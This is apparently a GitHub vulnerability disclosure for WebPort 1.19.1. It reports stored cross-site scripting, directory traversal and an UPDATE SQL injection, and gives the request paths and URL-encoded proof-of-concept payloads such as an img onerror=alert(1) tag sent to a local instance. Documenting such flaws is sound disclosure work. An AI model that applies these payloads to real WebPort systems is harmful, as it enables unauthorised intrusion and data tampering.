Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

WebPort 1.19.1


Stored xss in /access/setup?type-conn

in /access/setup?type-conn, in connection name,parameter name will be injected into HTML content with out any filter

http://127.0.0.1:8188/access/actionedit

type=conn&ip=localhost&name=localhost'%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&allow=1&showpageinfo=1&pin=1&print=1&autologin=

image.png-72.2kB

Directory traversal in tags of system settings

in tags of system settings, we can create a tags file just like tags.csv in \WebPort\system\tags.

and if we set tag=../test,and we will create a test.csv in \WebPort\system\

image.png-70.5kB

image.png-48.3kB

Stored xss in /script/listcalls

in /script/listcalls, in new called script, the description will be injected into HTML content with out any filter.

http://127.0.0.1:8188/script/actionedit

type=callscript&id=test&desc=test%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E

image.png-50.5kB

POST Stored xss and SQL injection in /log?type=error

in /access/setup?type-conn, in connection name,parameter name will be injected into HTML content with out any filter.

but if we set a connection name with a double quote or a single quote,just like test" or test', the connection name will be injected into UPDATE SQL query.

image.png-32.8kB

just like

UPDATE Data SET data = '{"default":{"IP":"default","Name":"default","Allow":true,"AllowPin":false,"Fullscreen":false,"ShowPageInfo":true,"Zoom":false,"Scale":false,"EmbedPdf":false,"PinSidemenu":true,"AllowScriptCall":false,"AllowPrint":true,"AutoLogin":"","AllowAccessTicket":false,"AllowAccessTicketCreation":false,"DisplayConfiguration":{}},"localhost":{"IP":"localhost","Name":"localhost'

","Allow":true,"AllowPin":false,"Fullscreen":false,"ShowPageInfo":true,"Zoom":false,"Scale":false,"EmbedPdf":false,"PinSidemenu":true,"AllowScriptCall":false,"AllowPrint":true,"AutoLogin":"","AllowAccessTicket":false,"AllowAccessTicketCreation":false,"DisplayConfiguration":{}}}' WHERE deviceguid = '59E1AAD5-8DF6-4A3A-88BD-E311A536F71B' AND key = 'Connections'

it is a UPDATE SQL injection.

if you set connection name just like a localhost <img src="/" onerror="alert(1)">, so this name will be injected into HTML content with out any filter.

image.png-98.4kB

image.png-34.6kB